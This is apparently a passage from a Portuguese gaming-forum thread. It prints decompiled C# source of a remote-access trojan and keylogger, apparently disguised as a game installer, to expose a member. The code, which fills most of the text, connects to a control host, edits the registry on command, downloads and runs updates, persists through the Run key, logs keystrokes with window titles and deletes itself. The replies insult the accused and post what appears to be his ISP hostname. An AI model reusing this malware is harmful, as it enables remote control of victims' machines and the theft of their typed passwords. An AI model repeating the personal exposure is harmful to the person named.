System.IO.File.WriteAllBytes(str, bytes); OK.Send("MSG" + OK.Y + "Updating To " + new FileInfo(str).Name); Process.Start(str, "UP:" + Conversions.ToString(Process.GetCurrentProcess().Id)); int num = 0; do { Thread.Sleep(10); if (Operators.ConditionalCompareObjectEqual(OK.F.Registry.CurrentUser.GetValue("di", (object) ""), (object) "!", false)) OK.UNS(); checked { ++num; } } while (num <= 500); } else { if (Operators.CompareString(Left1, "RG", false) != 0) return; RegistryKey key = OK.GetKey(strArray1[2]); string Left2 = strArray1[1]; if (Operators.CompareString(Left2, "~", false) == 0) { string str1 = "RG" + OK.Y + "~" + OK.Y + strArray1[2] + OK.Y; string str2 = ""; string[] subKeyNames = key.GetSubKeyNames(); int index1 = 0; while (index1 < subKeyNames.Length) { string str3 = subKeyNames[index1]; if (!str3.Contains("")) str2 = str2 + str3 + OK.Y; checked { ++index1; } } string[] valueNames = key.GetValueNames(); int index2 = 0; while (index2 < valueNames.Length) { string name = valueNames[index2]; str2 = str2 + name + "/" + key.GetValueKind(name).ToString() + "/" + key.GetValue(name, (object) "").ToString() + OK.Y; checked { ++index2; } } OK.Send(str1 + str2); } else if (Operators.CompareString(Left2, "!", false) == 0) key.SetValue(strArray1[3], (object) strArray1[4], (RegistryValueKind) Conversions.ToInteger(strArray1[5])); else if (Operators.CompareString(Left2, "@", false) == 0) key.DeleteValue(strArray1[3], false); else if (Operators.CompareString(Left2, "#", false) == 0) { key.CreateSubKey(strArray1[3]); } else { if (Operators.CompareString(Left2, "$", false) != 0) return; key.DeleteSubKeyTree(strArray1[3]); } } } catch (Exception ex1) { ProjectData.SetProjectError(ex1); Exception exception = ex1; try { OK.Send("ER" + OK.Y + strArray1[0] + OK.Y + exception.Message); } catch (Exception ex2) { ProjectData.SetProjectError(ex2); ProjectData.ClearProjectError(); } ProjectData.ClearProjectError(); } } public static string getMD5Hash(byte[] B) { B = new MD5CryptoServiceProvider().ComputeHash(B); string str = ""; byte[] numArray = B; int index = 0; while (index < numArray.Length) { byte num = numArray[index]; str = str + num.ToString("x2"); checked { ++index; } } return str; } public static RegistryKey GetKey(string key) { if (key.StartsWith(OK.F.Registry.ClassesRoot.Name)) { string name = key.Replace(OK.F.Registry.ClassesRoot.Name + "", ""); return OK.F.Registry.ClassesRoot.OpenSubKey(name, true); } else if (key.StartsWith(OK.F.Registry.CurrentUser.Name)) { string name = key.Replace(OK.F.Registry.CurrentUser.Name + "", ""); return OK.F.Registry.CurrentUser.OpenSubKey(name, true); } else if (key.StartsWith(OK.F.Registry.LocalMachine.Name)) { string name = key.Replace(OK.F.Registry.LocalMachine.Name + "", ""); return OK.F.Registry.LocalMachine.OpenSubKey(name, true); } else { if (!key.StartsWith(OK.F.Registry.Users.Name)) return (RegistryKey) null; string name = key.Replace(OK.F.Registry.Users.Name + "", ""); return OK.F.Registry.Users.OpenSubKey(name, true); } } public static void pr(int i) { try { OK.NtSetInformationProcess(Process.GetCurrentProcess().Handle, 29, ref i, 4); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } } public static bool Sendb(byte[] b) { if (!OK.Cn) return false; FileInfo fileInfo = OK.LO; Monitor.Enter((object) fileInfo); bool flag; try { if (!OK.Cn) { flag = false; } else { try { MemoryStream memoryStream = new MemoryStream(); memoryStream.Write(b, 0, b.Length); memoryStream.Write(OK.SB(ref OK.SPL), 0, OK.SPL.Length); OK.C.Client.Send(memoryStream.ToArray(), 0, checked ((int) memoryStream.Length), SocketFlags.None); memoryStream.Dispose(); flag = true; } catch (Exception ex1) { ProjectData.SetProjectError(ex1); try { if (OK.Cn) OK.C.Close(); } catch (Exception ex2) { ProjectData.SetProjectError(ex2); ProjectData.ClearProjectError(); } OK.Cn = false; flag = false; ProjectData.ClearProjectError(); } } } finally { Monitor.Exit((object) fileInfo); } return flag; } public static bool Send(string S) { return OK.Sendb(OK.SB(ref S)); } public static bool connect() { FileInfo fileInfo = OK.LO; Monitor.Enter((object) fileInfo); bool flag; try { try { if (OK.C != null) { try { OK.C.Client.Disconnect(false); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } try { OK.C.Close(); OK.C = (TcpClient) null; } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } } try { OK.MeM.Dispose(); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } OK.MeM = new MemoryStream(); try { if (OK.Pro != null) { OK.Pro.Kill(); OK.Pro = (Process) null; } } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } try { OK.C = new TcpClient(); Thread.Sleep(1000); OK.C.Connect(OK.H, Conversions.ToInteger(OK.P)); OK.Cn = true; OK.Send(OK.inf()); flag = OK.Cn; } catch (Exception ex) { ProjectData.SetProjectError(ex); OK.Cn = false; flag = false; ProjectData.ClearProjectError(); } } finally { Monitor.Exit((object) fileInfo); } return flag; } public static void RC() { while (true) { if (OK.C != null) { try { while (OK.Cn) { if ((uint) OK.C.Available > 0U) { OK.b = new byte[checked (OK.C.Client.Available - 1 + 1)]; int count = OK.C.Client.Receive(OK.b, 0, OK.b.Length, SocketFlags.None); if (count > 0) { OK.MeM.Write(OK.b, 0, count); while (true) { byte[] B = OK.MeM.ToArray(); if (OK.BS(ref B).Contains(OK.SPL)) { Array array = OK.fx(OK.MeM.ToArray(), OK.SPL); Thread thread = new Thread((ParameterizedThreadStart) (a0 => OK.Ind((byte[]) a0))); thread.Start(RuntimeHelpers.GetObjectValue(NewLateBinding.LateIndexGet((object) array, new object[1] { (object) 0 }, (string[]) null))); thread.Join(200); OK.MeM.Dispose(); OK.MeM = new MemoryStream(); if (array.Length == 2) OK.MeM.Write((byte[]) NewLateBinding.LateIndexGet((object) array, new object[1] { (object) 1 }, (string[]) null), 0, Conversions.ToInteger(NewLateBinding.LateGet(NewLateBinding.LateIndexGet((object) array, new object[1] { (object) 1 }, (string[]) null), (System.Type) null, "length", new object[0], (string[]) null, (System.Type[]) null, (bool[]) null))); else break; } else break; } } else break; } else { int num = OK.C.GetStream().ReadByte(); if (num != -1) OK.MeM.WriteByte(checked ((byte) num)); else break; } Thread.Sleep(1); } } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } } do { OK.Cn = false; Thread.Sleep(2500); } while (!OK.connect()); OK.Cn = true; } } public static void UNS() { OK.pr(0); try { OK.F.Registry.CurrentUser.OpenSubKey(OK.sf, true).DeleteValue(OK.RG, false); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } try { OK.F.Registry.LocalMachine.OpenSubKey(OK.sf, true).DeleteValue(OK.RG, false); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } try { Interaction.Shell("netsh firewall delete allowedprogram "" + OK.LO.FullName + """, AppWinStyle.Hide, false, -1); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } try { if (OK.FS != null) { OK.FS.Dispose(); System.IO.File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "" + OK.RG + ".exe"); } } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } try { OK.F.Registry.CurrentUser.OpenSubKey("Software", true).DeleteSubKey(OK.RG, false); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } try { Interaction.Shell("cmd.exe /c ping 127.0.0.1 & del "" + OK.LO.FullName + """, AppWinStyle.Hide, false, -1); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } ProjectData.EndApp(); } } } kl.cs (onde está as funções do keylogger) // Type: ClassLibrary1.kl // Assembly: ClassLibrary1, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: 136249B6-9CCC-46D6-9130-51FC3F47C092 // Assembly location: C:UsersTiagoDocumentsPumaMt2_install.exe using Microsoft.VisualBasic; using Microsoft.VisualBasic.CompilerServices; using Microsoft.VisualBasic.Devices; using System; using System.Diagnostics; using System.IO; using System.Runtime.InteropServices; using System.Text; using System.Threading; using System.Windows.Forms; namespace ClassLibrary1 { public class kl { private int LastAV; private string LastAS; private Keys lastKey; public Clock Clock; public string Logs; private Keyboard keyboard; public string LogsPath; public kl() { this.lastKey = Keys.None; this.Clock = new Clock(); this.Logs = ""; this.keyboard = new Keyboard(); this.LogsPath = Application.ExecutablePath + ".tmp"; } [DllImport("user32.dll")] private static int ToUnicodeEx(uint wVirtKey, uint wScanCode, byte[] lpKeyState, [MarshalAs(UnmanagedType.LPWStr), Out] StringBuilder pwszBuff, int cchBuff, uint wFlags, IntPtr dwhkl); [DllImport("user32.dll")] private static bool GetKeyboardState(byte[] lpKeyState); [DllImport("user32.dll")] private static uint MapVirtualKey(uint uCode, uint uMapType); [DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)] private static int GetWindowThreadProcessId(IntPtr hwnd, ref int lpdwProcessID); [DllImport("user32", CharSet = CharSet.Ansi, SetLastError = true)] private static int GetKeyboardLayout(int dwLayout); [DllImport("user32", CharSet = CharSet.Ansi, SetLastError = true)] private static IntPtr GetForegroundWindow(); [DllImport("user32", CharSet = CharSet.Ansi, SetLastError = true)] private static short GetAsyncKeyState(int vKey); private string AV() { try { IntPtr foregroundWindow = kl.GetForegroundWindow(); int lpdwProcessID; kl.GetWindowThreadProcessId(foregroundWindow, ref lpdwProcessID); Process processById = Process.GetProcessById(lpdwProcessID); if (!(foregroundWindow.ToInt32() == this.LastAV & Operators.CompareString(this.LastAS, processById.MainWindowTitle, false) == 0 | processById.MainWindowTitle.Length == 0)) { this.LastAV = foregroundWindow.ToInt32(); this.LastAS = processById.MainWindowTitle; return "rnx0001" + this.HM() + " " + processById.ProcessName + " " + this.LastAS + "x0001rn"; } } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } return ""; } private string HM() { string str; try { str = this.Clock.LocalTime.ToString("yy/MM/dd"); } catch (Exception ex) { ProjectData.SetProjectError(ex); str = "??/??/??"; ProjectData.ClearProjectError(); } return str; } private static string VKCodeToUnicode(uint VKCode) { try { StringBuilder pwszBuff = new StringBuilder(); byte[] lpKeyState = new byte[(int) byte.MaxValue]; if (!kl.GetKeyboardState(lpKeyState)) return ""; uint wScanCode = kl.MapVirtualKey(VKCode, 0U); IntPtr foregroundWindow = kl.GetForegroundWindow(); int lpdwProcessID = 0; IntPtr dwhkl = (IntPtr) kl.GetKeyboardLayout(kl.GetWindowThreadProcessId(foregroundWindow, ref lpdwProcessID)); kl.ToUnicodeEx(VKCode, wScanCode, lpKeyState, pwszBuff, 5, 0U, dwhkl); return pwszBuff.ToString(); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } return ((Keys) checked ((int) VKCode)).ToString(); } private string Fix(Keys k) { bool flag = this.keyboard.ShiftKeyDown; if (this.keyboard.CapsLock) flag = !flag; string str; try { Keys keys = k; str = keys == Keys.F1 || keys == Keys.F2 || (keys == Keys.F3 || keys == Keys.F4) || (keys == Keys.F5 || keys == Keys.F6 || (keys == Keys.F7 || keys == Keys.F8)) || (keys == Keys.F9 || keys == Keys.F10 || (keys == Keys.F11 || keys == Keys.F12) || (keys == Keys.End || keys == Keys.Delete || keys == Keys.Back)) ? "[" + k.ToString() + "]" : (keys == Keys.LShiftKey || keys == Keys.RShiftKey || (keys == Keys.Shift || keys == Keys.ShiftKey) || (keys == Keys.Control || keys == Keys.ControlKey || (keys == Keys.RControlKey || keys == Keys.LControlKey)) || keys == Keys.Alt ? "" : (keys != Keys.Space ? (keys == Keys.Return || keys == Keys.Return ? (!this.Logs.EndsWith("[ENTER]rn") ? "[ENTER]rn" : "") : (keys != Keys.Tab ? (!flag ? kl.VKCodeToUnicode(checked ((uint) k)) : kl.VKCodeToUnicode(checked ((uint) k)).ToUpper()) : "[TAP]rn")) : " ")); } catch (Exception ex) { ProjectData.SetProjectError(ex); if (flag) { str = Strings.ChrW((int) k).ToString().ToUpper(); ProjectData.ClearProjectError(); } else { str = Strings.ChrW((int) k).ToString().ToLower(); ProjectData.ClearProjectError(); } } return str; } public void WRK() { try { this.Logs = File.ReadAllText(this.LogsPath); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } try { int num1 = 0; while (true) { checked { ++num1; } int vKey = 0; do { if ((int) kl.GetAsyncKeyState(vKey) == -32767) { Keys k = (Keys) vKey; string str = this.Fix(k); if (str.Length > 0) { this.Logs = this.Logs + this.AV(); this.Logs = this.Logs + str; } this.lastKey = k; } checked { ++vKey; } } while (vKey <= (int) byte.MaxValue); if (num1 == 1000) { num1 = 0; int num2 = 20480; if (this.Logs.Length > num2) this.Logs = this.Logs.Remove(0, checked (this.Logs.Length - num2)); File.WriteAllText(this.LogsPath, this.Logs); } Thread.Sleep(1); } } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } } } } A.cs (onde está o main e é chamado tudo, com os respectivos exception handlers) // Type: ClassLibrary1.A // Assembly: ClassLibrary1, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: 136249B6-9CCC-46D6-9130-51FC3F47C092 // Assembly location: C:UsersTiagoDocumentsPumaMt2_install.exe using Microsoft.VisualBasic; using Microsoft.VisualBasic.CompilerServices; using Microsoft.Win32; using System; using System.Diagnostics; using System.Threading; using System.Windows.Forms; namespace ClassLibrary1 { public class A { [sTAThread] public static void main() { if (Interaction.Command() != null) { if (Interaction.Command().Length > 0) { string[] strArray = Strings.Split(Interaction.Command(), ":", -1, CompareMethod.Binary); string Left = strArray[0]; if (Operators.CompareString(Left, "UP", false) == 0) { try { OK.F.Registry.CurrentUser.SetValue("di", (object) "!"); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } try { Process processById = Process.GetProcessById(Conversions.ToInteger(strArray[1])); processById.WaitForExit(5000); try { processById.Dispose(); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } } catch (Exception ex) { ProjectData.SetProjectError(ex); Thread.Sleep(5000); ProjectData.ClearProjectError(); } } else if (Operators.CompareString(Left, "..", false) == 0) Thread.Sleep(5000); } } try { Mutex.OpenExisting(OK.RG); ProjectData.EndApp(); } catch (Exception ex) { ProjectData.SetProjectError(ex); bool createdNew = false; OK.MT = new Mutex(true, OK.RG, out createdNew); if (!createdNew) ProjectData.EndApp(); ProjectData.ClearProjectError(); } OK.INS(); new Thread(new ThreadStart(OK.RC), 1).Start(); try { OK.kq = new kl(); new Thread(new ThreadStart(OK.kq.WRK), 1).Start(); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } int num = 0; string Left1 = ""; if (OK.BD) { try { SystemEvents.SessionEnding += (SessionEndingEventHandler) ((a0, a1) => OK.ED()); OK.pr(1); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } } while (true) { Thread.Sleep(1000); Application.DoEvents(); try { checked { ++num; } if (num == 5) { try { OK.EmptyWorkingSet((long) Process.GetCurrentProcess().Handle); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } } if (num > 8) { num = 0; string Right = OK.ACT(); if (Operators.CompareString(Left1, Right, false) != 0) { Left1 = Right; OK.Send("act" + OK.Y + Right); } } if (OK.Isu) { try { if (Operators.ConditionalCompareObjectNotEqual(OK.F.Registry.CurrentUser.GetValue(OK.sf + "" + OK.RG, (object) ""), (object) (""" + OK.LO.FullName + "" .."), false)) OK.F.Registry.CurrentUser.OpenSubKey(OK.sf, true).SetValue(OK.RG, (object) (""" + OK.LO.FullName + "" ..")); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } try { if (Operators.ConditionalCompareObjectNotEqual(OK.F.Registry.LocalMachine.GetValue(OK.sf + "" + OK.RG, (object) ""), (object) (""" + OK.LO.FullName + "" .."), false)) OK.F.Registry.LocalMachine.OpenSubKey(OK.sf, true).SetValue(OK.RG, (object) (""" + OK.LO.FullName + "" ..")); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } } } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } } } } } Resumindo pastor alemão és um merdas. Frase sempre relembrada após o teu ban permanente: "Haters gonna Haters" - (Grammar Nazi) Pastor Alemão 6 GuiGy123, Sr.Coninhas, HomenDoNorte and 3 others reacted to this Share this post Link to post Share on other sites
õ.Ô FuckingBoSs õ.Ô 1,565 Posted December 26, 2013 Ele já devia estar a mais tempo banido eu sei que ele vai voltar vai fazer outra com outro IP, mas da sua reputação não pode escapar. E para o pessoal que defendia vejam como é ele na verdade, ele sempre rouba.Para quem o defendi-a agora quero ver as vossas reacões, já sabem nunca aceitem nada dele, senão podem por a vossa segurança em risco 1 Sr.Coninhas reacted to this Share this post Link to post Share on other sites
ThatGuyPT 457 Posted December 26, 2013 Para os que me acusavam de infantilidade eu sei muito bem a mente desses putos molestados pelos pais funciona, não guardo rancor e perdoo toda a gente, mas espero que finalmente percebam o grande filho da XXXX que têm andado a defender que não tem outro nome. Orgulho: Share this post Link to post Share on other sites
Guest Morfo2isBack Posted December 26, 2013 Esse jovem devia levar uma multa para aprender a nunca mais cometer crimes. Teve falta de educação parental, só pode. Share this post Link to post Share on other sites
ThatGuyPT 457 Posted December 26, 2013 Esse jovem devia levar uma multa para aprender a nunca mais cometer crimes. Teve falta de educação parental, só pode. Basta apresentar queixa. Qualquer pessoa que leve o arquivo á esquadra consegue que isso aconteça. Share this post Link to post Share on other sites
p0w3r0ff 3,795 Posted December 26, 2013 Eu só tenho de agradecer, Zelaste pela segurança de todos os membros, Esse miúdo é um parasita vive com o mal dos outros. Cumprimentos 2 DarkWolf and Henrique Oliveira reacted to this Share this post Link to post Share on other sites
WєlรнFlαรн 5 Posted December 26, 2013 Finalmente :3333 Share this post Link to post Share on other sites
ThatGuyPT 457 Posted December 26, 2013 Sem problema, é só reunir todas as provas reveladoras de personalidade deste menino.Há muito tempo que esperava por este momento. Share this post Link to post Share on other sites
-Ħalloween. 290 Posted December 26, 2013 Tanto tempo a espera... Nem posso acreditar! ISTO SIM FOI UM PRESENTE DE NATAL 1 Khavro reacted to this Share this post Link to post Share on other sites
Auros ( ͡ʘ ͜ʖ ͡ʘ) 172 Posted December 26, 2013 Me emocionei...., caraca velho se fores a policia dou te um pay de 10 xD ;_; XUEGUE Share this post Link to post Share on other sites
ThatGuyPT 457 Posted December 26, 2013 Me emocionei...., caraca velho se fores a policia dou te um pay de 10 xD ;_; XUEGUETenho tudo para isso, mas ele não responde ás ameaças que lhe fiz pelo skype, ainda vou pensar no caso.bl5-116-237.dsl.telepac.ptXUEGUE Share this post Link to post Share on other sites
ThatGuyPT 457 Posted December 26, 2013 Bem e como o uso de HTTrack também é uma ofensa punida pelas leis do cyber-crime deixo aqui mais uma prova de outro crime cometido pelo pastor alemão# Share this post Link to post Share on other sites